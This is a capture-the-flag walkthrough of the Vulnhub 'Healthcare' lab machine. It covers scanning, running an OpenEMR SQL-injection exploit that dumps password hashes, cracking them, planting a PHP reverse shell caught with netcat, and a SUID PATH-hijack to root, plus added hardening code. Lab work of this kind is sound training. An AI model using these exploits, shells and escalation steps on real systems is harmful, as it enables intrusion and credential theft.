Vulnhub: Healthcare machine, detailed walkthrough


Healthcare

Author: jason huawen
Machine information

Name:
Address:
Identifying the target host IP address
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
     Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

     3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
     _____________________________________________________________________________
       IP            At MAC Address     Count     Len  MAC Vendor / Hostname
     -----------------------------------------------------------------------------
     192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
     192.168.56.100  08:00:27:69:f3:d5      1      60  PCS Systemtechnik GmbH
     192.168.56.254  08:00:27:f6:d1:32      1      60  PCS Systemtechnik GmbH
Using Kali Linux's netdiscover, the target host's IP address is identified as 192.168.56.254 (its MAC 08:00:27:f6:d1:32 is the VirtualBox NIC that the Nmap scan below also reports).
Nmap scan
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDT
    Nmap scan report for inplainsight (192.168.56.254)
    Host is up (0.000090s latency).
    Not shown: 65533 closed tcp ports (reset)
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     ProFTPD 1.3.3d
    80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
    | http-robots.txt: 8 disallowed entries
    | /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/
    |_/all_our_e-mail_addresses /admin/ /
    |_http-title: Coming Soon 2
    |_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
    MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)
    Service Info: OS: Unix
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
The Nmap scan shows two open ports on the target: 21 (FTP, ProFTPD 1.3.3d) and 80 (HTTP, Apache 2.2.17 on PCLinuxOS 2011). The http-robots.txt script already lists eight disallowed entries worth a look, /admin/ among them.
Getting a shell
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ ftp 192.168.56.254
    Connected to 192.168.56.254.
    220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]
    Name (192.168.56.254:kali): anonymous
    331 Password required for anonymous
    Password:
    530 Login incorrect.
    ftp: Login failed
    ftp> quit
    221 Goodbye.

    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ searchsploit ProFTPD
    -----------------------------------------------------------------

  • FTP does not allow anonymous login.
  • The FTP service is ProFTPD 1.3.3d. It might have the mod_copy bug (SITE CPFR/CPTO arbitrary file copy, CVE-2015-3306), but that issue is reported against 1.3.5, so it is unlikely to apply to 1.3.3d, and it is not pursued here.
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ curl http://192.168.56.254/robots.txt
    # $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
    # $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
    # exclude help system from robots
    User-agent: *
    Disallow: /manual/
    Disallow: /manual-2.2/
    Disallow: /addon-modules/
    Disallow: /doc/
    Disallow: /images/
    # the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
    Disallow: /all_our_e-mail_addresses
    # same idea here...
    Disallow: /admin/
    # but allow htdig to index our doc-tree
    #User-agent: htdig
    #Disallow:
    # disallow stress test
    user-agent: stress-agent
    Disallow: /
robots.txt has an /admin/ entry, but requesting that directory returns a not-found page (the file is the distribution's stock robots.txt, so its entries are not specific to this site).
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ nikto -h http://192.168.56.254
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.56.254
    + Target Hostname:    192.168.56.254
    + Target Port:        80
    + Start Time:         2023-04-21 22:08:13 (GMT-4)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
    + Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan  6 01:21:38 2018
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + "robots.txt" contains 8 entries which should be manually viewed.
    + Uncommon header 'tcn' found, with contents: list
    + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
    + Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
    + OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
    + OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
    + OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
    + OSVDB-3233: /icons/README: Apache default file found.
    + 9543 requests: 0 error(s) and 13 item(s) reported on remote host
    + End Time:           2023-04-21 22:09:10 (GMT-4) (57 seconds)
    ---------------------------------------------------------------------------
The nikto scan reports that /cgi-bin/test.cgi appears vulnerable to Shellshock (CVE-2014-6271 / CVE-2014-6278); searching turns up the matching exploit code:
    https://www.exploit-db.com/exploits/34900
But that script does not work against this target, so another way in has to be found. Keep in mind that "the exploit script failed" is not the same as "not vulnerable": a hand-made probe with a crafted User-Agent header settles which of the two it is before the finding is written off.
Next, enumerate directories:
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh
    ===============================================================
    Gobuster v3.3
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.56.254
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.3
    [+] Extensions:              js,html,txt,sh,php
    [+] Timeout:                 10s
    ===============================================================
    2023/04/21 22:56:51 Starting gobuster in directory enumeration mode
    ===============================================================
    /images               (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]
    /index.html           (Status: 200) [Size: 5031]
    /index                (Status: 200) [Size: 5031]
    /.html                (Status: 403) [Size: 1000]
    /css                  (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]
    /js                   (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]
    /vendor               (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]
    /favicon              (Status: 200) [Size: 1406]
    /robots               (Status: 200) [Size: 620]
    /robots.txt           (Status: 200) [Size: 620]
    /fonts                (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]
    /gitweb               (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]
    /.html                (Status: 403) [Size: 1000]
    /phpMyAdmin           (Status: 403) [Size: 59]
    /server-status        (Status: 403) [Size: 1000]
    /server-info          (Status: 403) [Size: 1000]
    /openemr              (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]
The scan turns up /openemr; the other directories (phpMyAdmin and server-status are 403) offer nothing useful.
Visiting /openemr shows the CMS is OpenEMR, version 4.1.0. Check whether it has known vulnerabilities:
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ searchsploit openEMR 4.1.0
    -------------------------------------------------------------------------------------------- ---------------------------------
    Exploit Title                                                                              |  Path
    -------------------------------------------------------------------------------------------- ---------------------------------
    OpenEMR 4.1.0 - 'u' SQL Injection                                                           | php/webapps/49742.py
    Openemr-4.1.0 - SQL Injection                                                               | php/webapps/17998.txt
    -------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results

    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ searchsploit -m php/webapps/49742.py
      Exploit: OpenEMR 4.1.0 - 'u' SQL Injection
          URL: https://www.exploit-db.com/exploits/49742
         Path: /usr/share/exploitdb/exploits/php/webapps/49742.py
        Codes: N/A
     Verified: False
    File Type: Python script, ASCII text executable
    Copied to: /home/kali/Vulnhub/Healthcare/49742.py
Copy the exploit into the working directory and run it:
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ python 49742.py
       ____                   ________  _______     __ __   ___ ____
      / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \
     / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
    / /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ /
    \____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/
        /_/
        ____  ___           __   _____ ____    __    _
       / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)
      / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /
     / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /
    /_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/   exploit by @ikuamike
    [+] Finding number of users...
    [+] Found number of users: 2
    [+] Extracting username and password hash...
    admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
    medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d
Look the hashes up with an online SHA-1 reverse-lookup site:
    https://md5decrypt.net/en/Sha1/#answer
This gives admin's password as ackbar and the other user's (medical) password as medical. The 40-hex-character hashes are unsalted SHA-1, which is the only reason a plain lookup works at all; on a real engagement, crack them offline rather than pasting a client's hashes into a third-party website.
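An offline version of that lookup, added here as an example rather than code from the original post: a dictionary attack on the dumped unsalted SHA-1 hashes, next to the salted slow-KDF storage that would have made the dump useless to an attacker. The hash values are the two that 49742.py printed above; the wordlist is constructed for the example and the PBKDF2 record format is my own, not OpenEMR's.

```python
import hashlib
import hmac
import os

# Hashes dumped by 49742.py (40 hex chars = SHA-1, no salt).
DUMPED = {
    "admin": "3863efef9ee2bfbc51ecdca359c6302bed1389e8",
    "medical": "ab24aed5a7c4ad45615cd7e0da816eea39e4895d",
}

# Constructed mini wordlist; a real run reads rockyou.txt or a client list.
WORDLIST = ["password", "admin", "healthcare", "openemr", "ackbar", "medical"]


def sha1_hex(word):
    """Unsalted SHA-1 of the password, as this OpenEMR version stores it."""
    return hashlib.sha1(word.encode()).hexdigest()


def crack_sha1(targets, words):
    """Dictionary attack: hash each candidate once and match it against every
    target at the same time. Because there is no salt, the cost is linear in
    the wordlist no matter how many users were dumped."""
    wanted = {h.lower(): user for user, h in targets.items()}
    found = {}
    for word in words:
        user = wanted.get(sha1_hex(word))
        if user is not None:
            found[user] = word
    return found


def crack_sha1_from_file(targets, path):
    """Same attack, streaming a wordlist file line by line."""
    def lines():
        with open(path, "rb") as fh:
            for raw in fh:
                yield raw.rstrip(b"\r\n").decode("utf-8", "replace")
    return crack_sha1(targets, lines())


# Hardened storage for contrast: random per-user salt plus a slow KDF, so the
# same wordlist has to be re-run per user and each guess costs ~600k HMACs.
PBKDF2_ROUNDS = 600_000


def make_record(password):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return {"salt": salt.hex(), "hash": dk.hex(), "rounds": PBKDF2_ROUNDS}


def verify_record(password, record):
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["rounds"])
    # Constant-time compare so the check itself leaks nothing about the hash.
    return hmac.compare_digest(dk.hex(), record["hash"])


if __name__ == "__main__":
    print(crack_sha1(DUMPED, WORDLIST))
```

crack_sha1(DUMPED, WORDLIST) does the same job as the online lookup without leaving the machine; pass a real wordlist path to crack_sha1_from_file() for anything beyond a demo.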
Log in:
    http://192.168.56.254/openemr/
Under the Administration menu there is an "Edit file" function, and the editor shows each file's full path. Check whether reverse-shell PHP (shell.php) can be appended to one of the editable files, e.g. statement.inc.php. With the shell code appended to statement.inc.php and a listener already running on Kali, request the file:
    http://192.168.56.254/openemr/sites/default/statement.inc.php
which hands a reverse shell back to Kali Linux:
    ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
    └─$ sudo nc -nlvp 5555
    [sudo] password for kali:
    listening on [any] 5555 ...
    connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539
    Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
    20:50:43 up  1:55,  0 users,  load average: 1.00, 1.28, 3.57
    USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=479(apache) gid=416(apache) groups=416(apache)
    sh: no job control in this shell
    sh-4.1$ which python
    which python
    /usr/bin/python
    sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
    python -c 'import pty;pty.spawn("/bin/bash")'
    bash-4.1$ cd /home
    cd /home
    bash-4.1$ ls -alh
    ls -alh
    total 20K
    drwxr-xr-x  5 root     root     4.0K Jul 29  2020 .
    drwxr-xr-x 21 root     root     4.0K Apr 21 18:54 ..
    drwxr-xr-x 27 almirant almirant 4.0K Jul 29  2020 almirant
    drwxr-xr-x 31 medical  medical  4.0K Nov  5  2011 medical
    drwxr-xr-x  3 root     root     4.0K Nov  4  2011 mysql
    bash-4.1$ cat user.txt
    cat user.txt
    d41d8cd98f00b204e9800998ecf8427e
This gives the user flag.
Privilege escalation

Check whether the password recovered earlier also lets us switch to the medical user:
  1. bash-4.1$ su - medical
  2. su - medical
  3. Password: medical
  4. [medical@localhost ~]$ id
  5. id
  6. uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)
复制代码
我们的猜测是正确的
    [medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null
Among the results, /usr/bin/healthcheck is a non-standard binary with the SUID bit set:
    [medical@localhost backups]$ strings /usr/bin/healthcheck
    strings /usr/bin/healthcheck
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    _IO_stdin_used
    setuid
    system
    setgid
    __libc_start_main
    GLIBC_2.0
    PTRhp
    [^_]
    clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h
The strings show that healthcheck imports setuid, setgid and system, and that the command string it passes to system() calls ifconfig (as well as clear, sleep, fdisk and du) by bare name rather than absolute path. system() runs that string through /bin/sh, which resolves bare names via the caller's PATH, and the binary does not reset PATH. So we can put our own ifconfig first in PATH and it will run with root privileges. (A file containing just /bin/bash works because the kernel refuses to exec a file with no shebang and sh then interprets it as a script; a #!/bin/bash first line and chmod +x are the tidier equivalent of chmod 777. The resulting prompt is root rather than an euid-0 shell because the binary calls setuid/setgid before system().)
    [medical@localhost backups]$ cd /tmp
    [medical@localhost tmp]$ echo '/bin/bash' > ifconfig
    echo '/bin/bash' > ifconfig
    [medical@localhost tmp]$ chmod 777 ifconfig
    chmod 777 ifconfig
    [medical@localhost tmp]$ export PATH=/tmp:$PATH
    export PATH=/tmp:$PATH
    [medical@localhost tmp]$ /usr/bin/healthcheck
    /usr/bin/healthcheck
    TERM environment variable not set.
    System Health Check
    Scanning System
    [root@localhost tmp]# cd /root
    cd /root
    [root@localhost root]# ls -alh
    ls -alh
    total 920K
    drwxr-x--- 20 root root 4.0K Jul 29  2020 ./
    drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../
    -rw-------  1 root root  426 Jul 29  2020 .bash_history
    -rw-r--r--  1 root root  193 Sep 24  2011 .bash_profile
    -rw-rw-rw-  1 root root  422 Sep  6  2011 .bashrc
    drwxr-xr-x  2 root root 4.0K Sep 12  2011 .cache/
    drwx------  6 root root 4.0K Sep 12  2011 .config/
    drwx------  3 root root 4.0K Jul 19  2011 .dbus/
    drwxr--r--  2 root root 4.0K Jul 19  2011 Desktop/
    -rw-------  1 root root   28 Jul 22  2011 .dmrc
    drwx------  3 root root 4.0K Sep  8  2011 Documents/
    drwx------  2 root root 4.0K Sep  6  2011 drakx/
    drwx------  4 root root 4.0K Sep 24  2011 .gconf/
    drwx------  2 root root 4.0K Sep 24  2011 .gconfd/
    drwx------  3 root root 4.0K Sep 12  2011 .gnome2/
    drwx------  2 root root 4.0K Sep 12  2011 .gnome2_private/
    drwx------  3 root root 4.0K Jul 29  2020 .gnupg/
    drwx------  2 root root 4.0K Jul 19  2011 .gvfs/
    -rwxr-xr-x  1 root root 5.7K Jul 29  2020 healthcheck*
    -rw-r--r--  1 root root  182 Jul 29  2020 healthcheck.c
    -rw-------  1 root root    0 Sep 11  2011 .ICEauthority
    drwx------  3 root root 4.0K Sep  6  2011 .local/
    drwx------  3 root root 4.0K Nov  5  2011 .mc/
    -rw-r--r--  1 root root    0 Oct 22  2010 .mdk-menu-migrated
    -rw-r--r--  1 root root    0 Jul 21  2011 .menu-updates.stamp
    -rw-------  1 root root    6 Jul 29  2020 .mysql_history
    -rw-rw-rw-  1 root root 2.1K Jul 29  2020 root.txt
    -rw-r--r--  1 root root 797K Apr 12  2020 sudo.rpm
    drwx------  2 root root 4.0K Nov  5  2011 .synaptic/
    drwx------  2 root root 4.0K Sep 11  2011 .thumbnails/
    drwx------  2 root root 4.0K Apr 21 18:54 tmp/
    drwxr-xr-x  2 root root 4.0K Jul 29  2020 .xauth/
    -rw-r--r--  1 root root 1.9K Jul  6  2011 .xbindkeysrc
    [root@localhost root]# cat root.txt
    cat root.txt
    ██    ██  ██████  ██    ██     ████████ ██████  ██ ███████ ██████      ██   ██  █████  ██████  ██████  ███████ ██████  ██
     ██  ██  ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██
      ████   ██    ██ ██    ██        ██    ██████  ██ █████   ██   ██     ███████ ███████ ██████  ██   ██ █████   ██████  ██
       ██    ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██
       ██     ██████   ██████         ██    ██   ██ ██ ███████ ██████      ██   ██ ██   ██ ██   ██ ██████  ███████ ██   ██ ██


    Thanks for Playing!
    Follow me at: http://v1n1v131r4.com
    root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
    [root@localhost root]#
This gives a root shell and the root flag. The source of the SUID binary, healthcheck.c, sits in /root alongside it.
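As an added example (not the machine's or the author's code), the following Python audits the system() command string recovered from healthcheck: it lists which programs the shell will resolve through PATH, rewrites the string with absolute paths as the source-level fix, and reproduces the PATH shadowing unprivileged in a throwaway directory, both with the attacker's PATH and with the fixed PATH a hardened binary would set. The locations in FIXED_PATHS are an assumption about the PCLinuxOS 2011 layout, and the fake program's "HIJACKED" output is constructed.

```python
import os
import shlex
import stat
import subprocess
import tempfile

# Command string recovered from `strings /usr/bin/healthcheck` above.
HEALTHCHECK_CMD = ("clear ; echo 'System Health Check' ; echo '' ; "
                   "echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h")

# Words /bin/sh handles itself; PATH is never consulted for these.
SH_BUILTINS = {"echo", "cd", "export", "exit", "set", "unset", "test", "[",
               "true", "false", ":", "read", "eval", "exec"}
SEP_CHARS = set(";&|()")

# Where the real programs live: an assumption about the PCLinuxOS 2011 box.
FIXED_PATHS = {"clear": "/usr/bin/clear", "sleep": "/bin/sleep",
               "ifconfig": "/sbin/ifconfig", "fdisk": "/sbin/fdisk",
               "du": "/usr/bin/du"}

# PATH a SUID program should set for itself instead of trusting the caller's.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def parse(cmdline):
    """Split an `sh -c` string into argv lists and the separators between them,
    e.g. [['clear'], ';', ['echo', 'hi']]. Quotes are honoured like sh does."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    items, cur = [], []
    for tok in lex:
        if tok and set(tok) <= SEP_CHARS:      # ';', '&&', '||', '|', '&', ...
            if cur:
                items.append(cur)
                cur = []
            items.append(tok)
        else:
            cur.append(tok)
    if cur:
        items.append(cur)
    return items


def hijackable(cmdline):
    """Programs the shell looks up through PATH: bare names that are not
    builtins. With a SUID caller each one is a root shell waiting to happen."""
    names = []
    for item in parse(cmdline):
        if isinstance(item, list):
            name = item[0]
            if "/" not in name and name not in SH_BUILTINS and name not in names:
                names.append(name)
    return names


def absolutize(cmdline, table=FIXED_PATHS):
    """The source-level fix: invoke every program by absolute path."""
    out = []
    for item in parse(cmdline):
        if isinstance(item, list):
            argv = [table.get(item[0], item[0])] + item[1:]
            out.append(" ".join(shlex.quote(a) for a in argv))
        else:
            out.append(item)
    return " ".join(out)


def simulate(cmd, fake_name="ifconfig", sanitize_path=False):
    """Reproduce the hijack without root: drop a fake program into a scratch
    directory, put that directory first in PATH and run the command through
    `sh -c`, which is what system() does. With sanitize_path=True the shell
    gets the fixed SAFE_PATH instead (the run-time fix). Returns sh's stdout."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, fake_name)
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho HIJACKED\n")   # constructed stand-in
        os.chmod(fake, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP
                 | stat.S_IROTH | stat.S_IXOTH)       # 0755 is all it needs
        path = SAFE_PATH if sanitize_path else tmp + os.pathsep + SAFE_PATH
        res = subprocess.run(["sh", "-c", cmd], env={"PATH": path},
                             capture_output=True, text=True)
        return res.stdout


if __name__ == "__main__":
    print("PATH-resolved programs:", hijackable(HEALTHCHECK_CMD))
    print("hardened command:", absolutize(HEALTHCHECK_CMD))
    print("attacker PATH:", simulate("ifconfig").strip())
    print("fixed PATH   :", simulate("ifconfig", sanitize_path=True).strip())
```

The real fix is not to shell out from a SUID binary at all. If it must, it should both set PATH to a fixed value (or exec with an explicit environment) and name every program by absolute path as absolutize() does; either measure alone is enough to defeat the /tmp/ifconfig trick above, and doing both covers the case where one is later undone.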
Lessons learned


  • Once nikto reported that the target might have Shellshock, I assumed that vulnerability could be exploited and skipped the normal steps for a web application, namely directory enumeration; that enumeration also needs enough patience to reach the relevant directory, otherwise this machine has no way in.
